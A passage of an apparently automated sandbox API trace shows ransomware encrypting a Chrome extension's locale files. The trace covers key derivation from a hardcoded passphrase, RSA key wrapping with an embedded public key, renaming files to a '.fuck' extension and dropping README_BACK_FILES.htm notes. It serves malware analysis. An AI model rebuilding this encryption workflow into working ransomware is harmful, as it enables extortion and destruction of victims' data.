lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xb0, lpOverlapped=0x0) returned 1 [0255.509] CloseHandle (hObject=0x5d60) returned 1 [0255.509] CloseHandle (hObject=0x5d5c) returned 1 [0255.509] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json"), bFailIfExists=0) returned 1 [0255.514] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json", dwFileAttributes=0x0) returned 1 [0255.514] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.gsg")) returned 1 [0255.516] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json.fuck")) returned 1 [0255.517] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.517] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.517] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.517] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.517] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.517] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\readme_back_files.htm")) returned 0xffffffff [0255.518] AreFileApisANSI () returned 1 [0255.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.518] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.519] GetFileType (hFile=0x5d50) returned 0x1 [0255.519] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.520] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.520] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.521] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.521] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.521] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.521] GetLastError () returned 0x0 [0255.521] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json")) returned 0x20 [0255.521] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json", dwFileAttributes=0x80) returned 1 [0255.522] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.522] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.523] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.524] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.526] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.526] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.526] CryptHashData (hHash=0x2e18128, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.526] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18828) returned 1 [0255.527] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.527] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.527] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e11d60) returned 1 [0255.527] CryptImportPublicKeyInfo (in: hCryptProv=0x2e11d60, dwCertEncodingType=0x1, pInfo=0x2e297b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e297e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e297e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19028) returned 1 [0255.527] CryptEncrypt (in: hKey=0x2e19028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.536] CryptEncrypt (in: hKey=0x2e19028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e12118*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e12118*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.537] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e12118*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e12118*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.538] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x119, lpOverlapped=0x0) returned 1 [0255.540] CryptEncrypt (in: hKey=0x2e18828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x119, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0255.540] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0255.540] CloseHandle (hObject=0x5d5c) returned 1 [0255.540] CloseHandle (hObject=0x5d60) returned 1 [0255.540] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json"), bFailIfExists=0) returned 1 [0255.552] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json", dwFileAttributes=0x0) returned 1 [0255.553] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.gsg")) returned 1 [0255.554] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.fuck")) returned 1 [0255.555] CryptDestroyHash (hHash=0x2e18128) returned 1 [0255.555] CryptDestroyKey (hKey=0x2e18828) returned 1 [0255.555] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.555] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.555] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.555] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\readme_back_files.htm")) returned 0xffffffff [0255.556] AreFileApisANSI () returned 1 [0255.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.556] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.557] GetFileType (hFile=0x5d50) returned 0x1 [0255.557] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.558] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.558] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.559] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.559] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.560] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.560] GetLastError () returned 0x0 [0255.560] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json")) returned 0x20 [0255.560] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json", dwFileAttributes=0x80) returned 1 [0255.561] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.562] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.562] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.563] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.565] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.565] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.565] CryptHashData (hHash=0x2e18828, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.565] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.565] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.566] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.566] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e121a0) returned 1 [0255.566] CryptImportPublicKeyInfo (in: hCryptProv=0x2e121a0, dwCertEncodingType=0x1, pInfo=0x2e29200*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e29230*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e29238*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18f28) returned 1 [0255.566] CryptEncrypt (in: hKey=0x2e18f28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.566] CryptEncrypt (in: hKey=0x2e18f28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e11238*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e11238*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.566] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e11238*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e11238*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.568] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x14e, lpOverlapped=0x0) returned 1 [0255.569] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x14e, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x150) returned 1 [0255.569] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x150, lpOverlapped=0x0) returned 1 [0255.569] CloseHandle (hObject=0x5d60) returned 1 [0255.569] CloseHandle (hObject=0x5d5c) returned 1 [0255.569] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json"), bFailIfExists=0) returned 1 [0255.573] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json", dwFileAttributes=0x0) returned 1 [0255.573] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.gsg")) returned 1 [0255.575] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.fuck")) returned 1 [0255.576] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.576] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.576] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.576] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.576] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.577] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\readme_back_files.htm")) returned 0xffffffff [0255.577] AreFileApisANSI () returned 1 [0255.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.577] CreateFileW 